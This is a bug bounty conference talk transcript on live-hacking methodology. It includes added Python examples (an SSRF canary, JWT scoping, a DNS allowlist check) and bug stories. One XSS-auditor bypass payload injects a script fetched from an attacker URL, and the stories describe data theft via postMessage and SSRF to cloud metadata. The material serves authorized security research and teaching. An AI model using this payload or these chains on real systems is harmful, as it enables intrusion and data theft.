
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big

Frans Rosén
March 30, 2019

These are the slides from my talk at the Facebook/Google hosted event BountyCon 2019, held in Singapore on the 30th of March 2019.

Transcript

  2. Live Hacking like a MVH –
    A walkthrough on methodology
    and strategies to win big
    Frans Rosén – @fransrosen

  3. Frans Rosén @fransrosen
    Security Advisor at Detectify
    #6 on HackerOne leaderboard/all-time
    Blogs at labs.detectify.com

  4. H1-702 2017: Winner of MVH in Vegas! (Uber, Salesforce, Zenefits)
    H1-514 2018: Winner of MVH in Montreal! (Shopify)
    H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath)
    H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath)
    H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath)
    H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber)
    H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath)
    H1-202 2018: Winner Best bug in Washington (Mapbox)
    H1-3120 2018: Winner Best bug in Amsterdam (Dropbox)
    H1-514 2018: Winner Highest reputation in Montreal (Shopify)

  6. What is Live Hacking?

  7. 30 second elevator pitch
    • A "hacker-meets-dev face-to-face" bug bounty with special targets
    • First by HackerOne in 2016 in Vegas
    • More companies run these nowadays:
      H1, Bugcrowd, Facebook/Google, Visma. Smaller companies run their own as well

  8. (Unofficial first event in 2015)
    Justin Calmus, then CSO at Zenefits, and I drinking Old Fashioneds in Vegas:
    "We should bring some hackers together and hack"

  10. (Unofficial first event in 2015)
    The night after, 7 hackers in a suite at the MGM

  11. $101,000 paid that night!
    I went home with $51,000 after 7 hours of hacking

  12. A quick step by step

  14. 1. Hackers get an intro and a walkthrough
    • Hangout, slides, presented by the company itself
    • Ability to ask questions
    2. Often a bigger scope
    • Often *.company.com, *.company.dev, infrastructure, IPs
    • Open source repos by the company
    • Enterprise access to products
    • One time: social engineering(!)

  16. 3. Hackers get some time to do recon
    • This is a VERY important part
    • One time: 48 hours. Hard!
    • Slack instance with the company!
    4. Some allow pre-submissions
    • Awesome! Less pressure on the final day
    • Faster payouts on event day

  17. 5. Arriving at the event, meeting the company
    • At HQ or at a hacking event (Defcon, Black Hat, Nullcon etc)
    • Discussions here == PRICELESS!!
    • Valid bugs because I could discuss with the company:
      - This domain, what does it do?
      - Is this app supposed to work like this?
      - I noticed this weird behaviour, I think I can do this, what do you think?

  18. 6. Day of event. Wake up early, shower and HACK
    • If no pre-submissions, get reports in!
    • Hacking day is special, sit in teams, collaboration(!)
    • Found many bugs on the actual day!

  19. Some events without pre-submissions award "first X valid bugs"

  20. Enter bountyplz!

  21. github.com/fransr/bountyplz

  25. github.com/fransr/bountyplz
    Upcoming version, batch-mode
    • 24 reports sent in 4 seconds

  26. 7. Show & Tell
    • Best part of the event
    • Customer picks bugs to be presented
    • Amazing! Other hackers' bugs in a cool micro-talk style (5 min max)

  28. Strategy/Methodology
    The most interesting part. How to approach targets?
    This is my experience, others might do it differently!

  29. Good overview of scope
    Make sure you have/know:
    • credentials needed
    • what domains are included, subdomains/acquisitions
    • what NOT to focus on (out-of-scope)
    • upgrades to enterprise accounts if promised

  31. Teaming!
    Seriously, this is EXTREMELY VALUABLE
    I've made more money hacking as a team

  33. Teaming!
    Team up with someone that:
    • puts in "similar" effort to you
    • might know stuff you don't
    • helps you cover more target surface
    • you can communicate and brainstorm with
    Keep the team small, 2-4.
    If 3 or more, effort will differ; allow the split to differ too.
    For 2 people, 50% each is always the simplest.

  34. What to focus on?

  36. High threshold or labour intensive testing
    • Best bugs!
    Example: trying all integrations from a list of 80.
    Read docs on how each worked.
    Found a $20k bug due to one (1!!!) faulty implementation!

  38. How the SDK talks with the API
    • Desktop client
    • Web (API-paths in JS-files)
    • PHP/Java/Golang-SDKs
    • npm/composer/yarn
    Legacy versions of APIs?
    • Older versions still working?
    • Are there docs? Web-archive?

  40. Integrations with 3rd parties (!)
    • Have integrations? (Slack, Trello, Zapier etc)
    • Allow integrations? (OAuth etc)
    • Public repos with examples?
    Company's Github repos
    • What software they use (forks)
    • Synced with the original repo? (If not: find vulns by diffing versions)

  42. Github
    • Internal domains? Search in Gists, Github, Google
    • "Internal indicators", search everywhere
    • Domains/AWS/GCP-tools in org: "org:xxx amazonaws" etc
    • Any users in the organization?
    • Extract contributors from repos
    • Company name in users' repos: "user:xxx company-name"
    • Search Github Issues, funky stuff by accident!
    • Non-forked repos in the organization
      ‣ Package dependencies from employees?
      ‣ Still employed by the company? If not, bad

  44. Whitebox testing on the company's FOSS
    • Bugs might mean bugs in prod!
    • Might mean the company made other companies vulnerable
      (really bad PR for the company)
    LEGACY
    • Content from web-archive, read old documentation(!!!)
    • URLs from web-archive's CDX-api, commoncrawl etc.
    • Test all URLs. Distinguish status-codes / bytes received (Wfuzz)
    • Anything interesting? Filter file-types, deduplicate

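The LEGACY bullets above describe mining a web archive for old URLs, then filtering, deduplicating and testing them. The Python below is an added example, not a tool from the talk: it parses a few constructed lines in the Wayback Machine's CDX text format (nothing is fetched), drops static assets, collapses URL variants that hit the same server-side handler, and groups what is left by status code and byte count the way you would filter a Wfuzz run. The sample hostnames, the extension lists and the use of the archived length as a stand-in for bytes received are all assumptions.

```python
"""Mine a web-archive CDX export for legacy URLs worth testing.

Added example, not a tool from the talk. Input is a few constructed lines
in the Wayback Machine CDX text format (fields: urlkey timestamp original
mimetype statuscode digest length); nothing is fetched from the network.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, urlunsplit

# Constructed sample shaped like the output of
#   http://web.archive.org/cdx/search/cdx?url=example.com&matchType=domain
# (hostnames and paths are made up).
SAMPLE_CDX = """\
com,example)/ 20120101000000 http://example.com/ text/html 200 ABC 1234
com,example,api)/v1/users?id=5 20130303000000 http://api.example.com/v1/users?id=5 application/json 200 DEF 321
com,example,api)/v1/users?id=9 20130304000000 http://api.example.com/v1/users?id=9 application/json 200 DEG 321
com,example)/docs/api-v1.pdf 20120505000000 http://example.com/docs/api-v1.pdf application/pdf 200 GHI 99000
com,example)/static/logo.png 20120505000000 http://example.com/static/logo.png image/png 200 JKL 5000
com,example,legacy)/admin/export.php?format=xml 20110909000000 http://legacy.example.com/admin/export.php?format=xml text/html 302 MNO 0
com,example,legacy)/admin/export.php?format=csv 20110910000000 https://legacy.example.com/admin/export.php?format=csv text/html 200 PQR 4200
"""

# Static assets are noise; server-side scripts, docs and API formats are signal
# (assumed lists, extend them per target).
NOISE_EXT = {"png", "jpg", "jpeg", "gif", "css", "woff", "woff2", "svg", "ico"}
SIGNAL_EXT = {"php", "asp", "aspx", "jsp", "do", "cgi", "pdf", "txt", "xml", "json", "wsdl"}


def parse_cdx(text):
    """Yield (original_url, status, length) for each well-formed CDX line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue  # truncated line, skip it
        yield parts[2], parts[4], int(parts[6])


def extension(url):
    """Lower-cased file extension of the URL path, or '' if there is none."""
    m = re.search(r"\.([A-Za-z0-9]{1,5})$", urlsplit(url).path)
    return m.group(1).lower() if m else ""


def normalize(url):
    """Collapse variants that reach the same server-side handler: ignore the
    scheme, lower-case the host, keep query keys but blank their values."""
    s = urlsplit(url)
    keys = sorted({kv.split("=", 1)[0] for kv in s.query.split("&") if kv})
    query = "&".join(f"{k}=" for k in keys)
    return urlunsplit(("", s.netloc.lower(), s.path, query, ""))


def candidates(cdx_text):
    """Deduplicated, noise-filtered list of (url, status, length), keeping the
    first archived URL seen for each normalized form."""
    seen = {}
    for url, status, length in parse_cdx(cdx_text):
        if extension(url) in NOISE_EXT:
            continue
        seen.setdefault(normalize(url), (url, status, length))
    return sorted(seen.values())


def interesting(results):
    """Entries worth manual review first: server-side scripts, documentation
    and API formats, or anything that takes parameters."""
    return [r for r in results
            if extension(r[0]) in SIGNAL_EXT or urlsplit(r[0]).query]


def bucket_by_response(results):
    """Group entries by (status, length) so identical-looking responses
    collapse, the way Wfuzz's --hc/--hl filters hide them; whatever sits
    in a bucket of its own is what to look at. The archived length stands
    in here for the byte count you would get when re-testing live."""
    buckets = defaultdict(list)
    for url, status, length in results:
        buckets[(status, length)].append(url)
    return dict(buckets)


if __name__ == "__main__":
    found = candidates(SAMPLE_CDX)
    for (status, length), urls in sorted(bucket_by_response(found).items()):
        print(f"{status} {length:>6}  " + ", ".join(urls))
    print("review first:", [r[0] for r in interesting(found)])
```

On a real target, replace SAMPLE_CDX with the CDX API output for the domain, feed the output of `candidates()` to Wfuzz or your own fetcher, and bucket the live responses the same way; the unique buckets are the ones to open by hand.
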
  46. Regular recon
    There is soooo much here we can't cover it all. These are general things
    • DNS, Subbrute, sublist3r etc. So many tools!
      ‣ Customized subbrute with 3rd party data
      ‣ Generate DNS-wordlist based on findings
    • Existing routes from JS-files, Burp History
    • postMessage-tracker (logs all listener functions)
    • Wfuzz target (VPN with switchable IP if blocked)
    Best protip:
    Focus on BORING/HARD STUFF, other hackers won't

  47. Notes
    While you hack. KISS!
    • Dir for target, TXT-file always open
    • Comments (snippets / indicators / urls)
    • Super helpful. Chaining bugs!
      - If an Open-Redirect, we can make a chain
    • Test-code, SDKs, screenshots in dir
    • Valid vulns in one place, separate from "interesting behaviour"

  48. Notes
    • On event, team up sharing "interesting behaviour" things
    • Burp history is golden, save it! Search a lot!
    Found bugs by searching:

  49. SSRF-testing server
    • ONLY reachable from the internal network (both IPv4/IPv6)
    • A virtual host / kubernetes node is a bad place for it, since those need a proper Host-header.
      Not all SSRFs send a proper Host-header
      (HTTP/1.0, binding an external DNS-host to an internal IP etc)
    • Different files, depending on the SSRF:
      MP3, ICS, XML, TXT, HTML, PNG, JPG, SVG etc.
    • Useful if internal hosts can be reached without scanning the internal network.
      One company had flags in files, simple to prove you could access them.

  50. SSRF-testing server
    Should be an open source project
    Anyone up for it?

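The SSRF-testing server the two slides above ask for, as an added Python example; it is not the open-source project the slide proposes and not code from the talk. It serves a flag-bearing body in whatever file type the requested path's extension asks for, answers no matter what Host header or HTTP version arrives, listens on one dual-stack IPv6 socket so IPv4 and IPv6 callbacks both land on it, and logs every request with its headers to stderr. The flag value, the body table and the default port are assumptions; keeping it reachable only from the internal network is a matter of the bind address and a firewall rule.

```python
"""SSRF canary: serve a flag in whatever file type the sink expects, ignore
the Host header, log what the request really looked like.

Added example, not the open-source project the slide asks for and not code
from the talk. Bind it on an address reachable only from the target's
internal network. FLAG, BODIES and the default port are assumptions.
"""
import json
import socket
import sys
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer

FLAG = "SSRF-CANARY-0001"  # assumed marker; put whatever proves access

# Body per extension. Text formats are complete; the binary ones carry only
# a file signature, enough for sinks that sniff the type, not for sinks that
# fully decode the file (swap in a real file for those).
BODIES = {
    "txt": ("text/plain", FLAG),
    "html": ("text/html", f"<html><body>{FLAG}</body></html>"),
    "xml": ("application/xml", f'<?xml version="1.0"?><r>{FLAG}</r>'),
    "json": ("application/json", json.dumps({"flag": FLAG})),
    "ics": ("text/calendar",
            "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
            f"SUMMARY:{FLAG}\r\nEND:VEVENT\r\nEND:VCALENDAR\r\n"),
    "svg": ("image/svg+xml",
            f'<svg xmlns="http://www.w3.org/2000/svg"><text>{FLAG}</text></svg>'),
    "png": ("image/png", b"\x89PNG\r\n\x1a\n" + FLAG.encode()),
    "jpg": ("image/jpeg", b"\xff\xd8\xff\xe0" + FLAG.encode()),
    "mp3": ("audio/mpeg", b"ID3" + FLAG.encode()),
}


def pick_response(path):
    """Map a request path such as /probe.ics to (content-type, body bytes).
    Unknown or missing extensions fall back to text/plain so every probe
    still returns the flag."""
    name = path.split("?", 1)[0].rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else "txt"
    ctype, body = BODIES.get(ext, BODIES["txt"])
    return ctype, body if isinstance(body, bytes) else body.encode()


def describe_request(client_ip, version, path, headers):
    """Structured log record. The Host header (or its absence) and the HTTP
    version tell you what the SSRF sink really sends, which is exactly why
    a name-based virtual host might never have seen the request."""
    lower = {k.lower(): v for k, v in headers.items()}
    return {
        "ts": datetime.now(timezone.utc).isoformat(),
        "client": client_ip,
        "version": version,
        "path": path,
        "host": lower.get("host"),
        "user_agent": lower.get("user-agent"),
        "headers": dict(headers),
    }


class CanaryHandler(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.0"  # keep it simple for HTTP/1.0 fetchers

    def do_GET(self):
        record = describe_request(self.client_address[0], self.request_version,
                                  self.path, self.headers)
        sys.stderr.write(json.dumps(record) + "\n")
        ctype, body = pick_response(self.path)
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_POST = do_GET  # a POST-based fetcher gets the same answer


class DualStackServer(HTTPServer):
    """IPv6 socket with V6ONLY off, so IPv4 clients arrive as ::ffff:a.b.c.d
    on the same listener and both address families are logged in one place."""
    address_family = socket.AF_INET6

    def server_bind(self):
        self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
        super().server_bind()


if __name__ == "__main__":
    # "::" is every interface; prefer the internal interface's own address
    # plus a firewall rule so the canary is not reachable from the internet.
    bind = sys.argv[1] if len(sys.argv) > 1 else "::"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    DualStackServer((bind, port), CanaryHandler).serve_forever()
```

Point the suspected SSRF at `http://<internal-ip>:8080/anything.ics` (or `.xml`, `.mp3`, whatever the feature consumes) and watch stderr: a hit with `"host": null` or `"version": "HTTP/1.0"` is the case the slide warns about, where a vhost-based listener would have answered with an error instead of the flag.
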
  52. Show & Tell!

  53. Unscoped JWT-token exposed in
    Squid proxy-error

  54. On-Premise/SaaS app

  55. Did not like internal requests

  56. But we see our own request headers

  57. And what about IPv6?

  58. Wow, a LOT more headers

  59. And here's a JWT?

  60. Nothing in the JWT said anything about my instance

  61. Sent a report

  62. Sent a Slack-DM to the company and asked

  66. JWT-token could access everyone

  67. Fix! Unique ID instead of admin

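The JWT story above (a token leaked in a proxy error page, nothing in it tied to one instance, so it worked against everyone; fixed by a unique ID instead of admin) reduced to code. This is an added Python example, not the vendor's implementation: the signing key, claim names and instance IDs are assumptions, and HS256 is hand-rolled so it runs without extra packages. `authorize_unscoped` is the bug as the slides describe it, `authorize_scoped` is the fix.

```python
"""Instance-scoped vs unscoped JWT authorization, with hand-rolled HS256.

Added example, not the vendor's code. It models the bug in the slides: the
token the proxy error page leaked had a generic subject ("admin") and no
claim tying it to one customer instance, so every instance's backend
accepted it. The fix mirrors "unique ID instead of admin": the subject is
a per-instance identifier the server compares with the instance being
served. Key, claim names and instance IDs are assumptions.
"""
import base64
import hashlib
import hmac
import json

SECRET = b"fleet-wide-signing-key"  # assumed: one key for the whole SaaS fleet


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_jwt(claims, secret=SECRET):
    """Mint an HS256 JWT for `claims` (no expiry handling, to stay short)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_jwt(token, secret=SECRET):
    """Return the claims dict if the signature is valid, otherwise None."""
    try:
        header, payload, sig = token.split(".")
        hdr = json.loads(_unb64url(header))
        if not isinstance(hdr, dict) or hdr.get("alg") != "HS256":
            return None  # the server, not the token, decides the algorithm
        expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64url(sig)):
            return None
        claims = json.loads(_unb64url(payload))
    except ValueError:  # bad base64, bad JSON, wrong number of segments
        return None
    return claims if isinstance(claims, dict) else None


def authorize_unscoped(token, instance_id):
    """Vulnerable: any validly signed token with the generic subject is
    accepted; `instance_id` is never consulted, so one leaked token opens
    every tenant that shares the signing key."""
    claims = verify_jwt(token)
    return claims is not None and claims.get("sub") == "admin"


def authorize_scoped(token, instance_id):
    """Fixed: the subject must equal the unique ID of the instance handling
    the request, so a token minted for another instance is refused."""
    claims = verify_jwt(token)
    return claims is not None and claims.get("sub") == instance_id


# Constructed scenario: two customer instances and the tokens their
# integrations would present.
INSTANCE_A, INSTANCE_B = "inst-7f3a9c", "inst-b2d114"
LEAKED_UNSCOPED = make_jwt({"sub": "admin", "role": "integration"})
TOKEN_FOR_A = make_jwt({"sub": INSTANCE_A, "role": "integration"})

if __name__ == "__main__":
    for name, token in (("leaked admin token", LEAKED_UNSCOPED), ("token for A", TOKEN_FOR_A)):
        for inst in (INSTANCE_A, INSTANCE_B):
            print(f"{name:>18} -> {inst}: unscoped={authorize_unscoped(token, inst)} "
                  f"scoped={authorize_scoped(token, inst)}")
```

When triaging a leaked token, decode the payload first: a subject or audience that is the same for every customer, with no tenant, instance or account claim beside it, is the "nothing in the JWT said anything about my instance" observation, and it is worth confirming against a second instance before reporting.
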
  69. Second order RCE 4 hours later

  71. Burp Collaborator payload gave a hit!
    WTH??

  72. Let's trigger "a few"

  73. Burp Intruder

  74. Header

  79. XSS on sandboxed domain
    stealing data from privileged domain

  80. Document-service on ACME.COM: "Create new doc"

  81. The document service on ACME.COM loads usersandbox.com and talks to it via postMessage

  82. postMessage payload: {"document":"AAA…"}

  83. XSS in the sandbox
    usersandbox.com

  84. Chrome XSS auditor bypass

        x=document.createElement('script');
        x.src=atob('MY-URL-BASE64-ENCODED');
        document.body.appendChild(x)-'%0d',({//#

  85. User opens link from sandbox (usersandbox.com) to ACME.COM "Create new doc"

  86. User uploads doc, iframe (usersandbox.com) opens

  87. Hijack iframe, due to Same-Origin Policy (the XSS page and the iframe are both on usersandbox.com)

  88. Uploads doc, postMessage

  89. Iframe leaks data to attacker

  90. We stole the document!

  92. DNS-hijack leading to RCE

  93. DNS-hijack on internal.company.com!

  94. Not a new thing, watch my talk from Secfest 2017

  95. DNS-hijack on
    internal.company.com!
    Awesome, what now?

  96. Testing tool, only allowed their own subdomains

  98. Let's create a subdomain pointing to metadata

  100. IPv6 FTW!

  101. BOOM!

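The allowlist the testing tool used, and the check that would have stopped the metadata trick, as an added Python example that is not the target's code. The scenario is read from the slides above and is an assumption: the tool only fetched URLs under the company's own domain, the hijacked internal.company.com put an attacker-controlled name inside that allowlist, and an IPv6 answer got past a check that only had IPv4 in mind. `allowed_by_name` is the name-only check, `allowed_by_address` resolves every A and AAAA answer and refuses anything that is not a public address, including IPv4-mapped IPv6 literals. The allowlist suffix, the constructed DNS table and the metadata address are assumptions.

```python
"""Hostname allowlist bypassed through DNS, and the address-level check that
closes it.

Added example, not the target's code. Assumed scenario from the slides: an
internal testing tool only fetched URLs under the company's own domain, but
a hijacked subdomain (internal.company.com) lets the tester put a name
inside that allowlist and point it at the cloud metadata service; an IPv6
answer slipped past a check that only had IPv4 in mind. The allowlist
suffix, the constructed DNS table and the metadata address are assumptions.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SUFFIX = ".company.com"  # assumed allowlist


def allowed_by_name(url):
    """Vulnerable: trusts the hostname alone. Whoever controls a record under
    the suffix (hijacked zone, dangling CNAME) chooses where it points."""
    host = (urlsplit(url).hostname or "").lower()
    return host.endswith(ALLOWED_SUFFIX)


def is_blocked_address(addr):
    """True unless `addr` is a public unicast address. IPv4-mapped IPv6
    literals (::ffff:a.b.c.d) are unwrapped first so the IPv4 classification
    applies; is_global then rejects loopback, link-local (169.254.0.0/16 and
    fe80::/10), RFC 1918, ULA (fc00::/7), multicast and reserved space."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not ip.is_global


def resolve_all(host, resolver=None):
    """All A and AAAA answers for `host`. `resolver` lets a caller inject
    answers (used here with a constructed zone so nothing is looked up);
    by default getaddrinfo is asked for both families."""
    if resolver is not None:
        return list(resolver(host))
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def allowed_by_address(url, resolver=None):
    """Fixed: the name must be in the allowlist AND every address it resolves
    to must be public. All answers are checked because the fetcher may pick
    the AAAA record even when the A record looks harmless."""
    if not allowed_by_name(url):
        return False
    addrs = resolve_all(urlsplit(url).hostname, resolver)
    return bool(addrs) and not any(is_blocked_address(a) for a in addrs)


# Constructed zone standing in for real DNS. The public addresses are
# arbitrary global unicast examples; 169.254.169.254 is the AWS metadata IP.
FAKE_DNS = {
    "www.company.com": ["93.184.216.34", "2001:4860:4860::8888"],
    "internal.company.com": ["169.254.169.254"],                 # hijacked, A only
    "v6.internal.company.com": ["93.184.216.34", "fd00::254"],   # clean A, ULA AAAA
    "mapped.internal.company.com": ["::ffff:169.254.169.254"],   # IPv4 inside IPv6
}


def fake_resolver(host):
    return FAKE_DNS.get(host.lower(), [])


if __name__ == "__main__":
    for name in FAKE_DNS:
        url = f"http://{name}/latest/meta-data/"
        print(f"{name:32} by name: {allowed_by_name(url)!s:5} "
              f"by address: {allowed_by_address(url, fake_resolver)}")
```

One caveat the check above does not cover: if the fetcher resolves the name a second time when it connects, a short-TTL record can answer with a public address for the check and the metadata address for the connection (DNS rebinding). The fix is to connect to the address that was checked, not to the name, and to refuse redirects unless the redirect target passes the same check.
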
  104. Asking to go deeper
    Nothing. Creds are limited :(

  106. User-data
    S3-bucket

  107. And yeeees! Full read/write access to the S3-bucket

  108. Files in the bucket used in a deploy-script

  109. Best bug of the event

  110. Final words
    1. Use the time before
    2. Do the time-consuming tasks no one else bothers with
    3. Move around, but if something is interesting, be persistent!
    4. Work as a team, it's amazing.
    Thank you!